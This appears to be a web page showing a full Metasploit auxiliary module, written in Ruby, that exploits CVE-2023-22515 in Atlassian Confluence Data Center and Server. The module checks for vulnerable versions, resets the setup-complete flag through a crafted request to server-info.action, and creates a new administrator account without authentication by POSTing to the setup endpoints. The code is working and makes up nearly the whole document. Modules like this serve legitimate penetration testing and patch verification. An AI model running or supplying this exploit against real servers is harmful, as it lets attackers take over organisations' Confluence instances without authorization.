Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7

8
  prepend Msf::Exploit::Remote::AutoCheck
9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control',
16
        'Description' => %q{
17
          This module exploits a broken access control vulnerability in Atlassian Confluence servers leading to an authentication bypass.
18
          A specially crafted request can be create new admin account without authentication on the target Atlassian server.
19
        },
20
        'Author' => [
21
          'Unknown', # exploited in the wild
22
          'Emir Polat' # metasploit module
23
        ],
24
        'References' => [
25
          ['CVE', '2023-22515'],
26
          ['URL', 'https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html'],
27
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-22515'],
28
          ['URL', 'https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis']
29
        ],
30
        'DisclosureDate' => '2023-10-04',
31
        'DefaultOptions' => {
32
          'RPORT' => 8090
33
        },
34
        'License' => MSF_LICENSE,
35
        'Notes' => {
36
          'Stability' => [CRASH_SAFE],
37
          'Reliability' => [REPEATABLE_SESSION],
38
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
39
        }
40
      )
41
    )
42

43
    register_options([
44
      OptString.new('TARGETURI', [true, 'Base path', '/']),
45
      OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username], regex: /^[a-z._@]+$/),
46
      OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]),
47
      OptString.new('NEW_EMAIL', [true, 'E-mail to be used when creating a new user with admin privileges', Faker::Internet.email])
48
    ])
49
  end
50

51
  def check
52
    res = send_request_cgi(
53
      'method' => 'GET',
54
      'uri' => normalize_uri(target_uri.path, '/login.action')
55
    )
56
    return Exploit::CheckCode::Unknown unless res
57
    return Exploit::CheckCode::Safe unless res.code == 200
58

59
    poweredby = res.get_xml_document.xpath('//ul[@id="poweredby"]/li[@class="print-only"]/text()').first&.text
60
    return Exploit::CheckCode::Safe unless poweredby =~ /Confluence (\d+(\.\d+)*)/
61

62
    confluence_version = Rex::Version.new(Regexp.last_match(1))
63

64
    vprint_status("Detected Confluence version: #{confluence_version}")
65

66
    if confluence_version.between?(Rex::Version.new('8.0.0'), Rex::Version.new('8.3.2')) ||
67
       confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.2')) ||
68
       confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.1'))
69
      return Exploit::CheckCode::Appears("Exploitable version of Confluence: #{confluence_version}")
70
    end
71

72
    Exploit::CheckCode::Safe("Confluence version: #{confluence_version}")
73
  end
74

75
  def run
76
    res = send_request_cgi(
77
      'method' => 'GET',
78
      'uri' => normalize_uri(target_uri.path, '/server-info.action'),
79
      'vars_get' => {
80
        'bootstrapStatusProvider.applicationConfig.setupComplete' => 'false'
81
      }
82
    )
83

84
    return fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Version vulnerable but setup is already completed') unless res&.code == 302 || res&.code == 200
85

86
    print_good('Found server-info.action! Trying to ignore setup.')
87

88
    created_user = create_admin_user
89

90
    res = send_request_cgi(
91
      'method' => 'POST',
92
      'uri' => normalize_uri(target_uri.path, 'setup/finishsetup.action'),
93
      'headers' => {
94
        'X-Atlassian-Token' => 'no-check'
95
      }
96
    )
97

98
    return fail_with(Msf::Exploit::Failure::NoAccess, 'The admin user could not be created. Try a different username.') unless created_user
99

100
    print_warning('Admin user was created but setup could not be completed.') unless res&.code == 200
101

102
    create_credential({
103
      workspace_id: myworkspace_id,
104
      origin_type: :service,
105
      module_fullname: fullname,
106
      username: datastore['NEW_USERNAME'],
107
      private_type: :password,
108
      private_data: datastore['NEW_PASSWORD'],
109
      service_name: 'Atlassian Confluence',
110
      address: datastore['RHOST'],
111
      port: datastore['RPORT'],
112
      protocol: 'tcp',
113
      status: Metasploit::Model::Login::Status::UNTRIED
114
    })
115

116
    print_good("Admin user was created successfully. Credentials: #{datastore['NEW_USERNAME']} - #{datastore['NEW_PASSWORD']}")
117
    print_good("Now you can login as administrator from: http://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}login.action")
118
  end
119

120
  def create_admin_user
121
    res = send_request_cgi(
122
      'method' => 'POST',
123
      'uri' => normalize_uri(target_uri.path, 'setup/setupadministrator.action'),
124
      'headers' => {
125
        'X-Atlassian-Token' => 'no-check'
126
      },
127
      'vars_post' => {
128
        'username' => datastore['NEW_USERNAME'],
129
        'fullName' => 'New Admin',
130
        'email' => datastore['NEW_EMAIL'],
131
        'password' => datastore['NEW_PASSWORD'],
132
        'confirm' => datastore['NEW_PASSWORD'],
133
        'setup-next-button' => 'Next'
134
      }
135
    )
136
    res&.code == 302
137
  end
138
end
139

140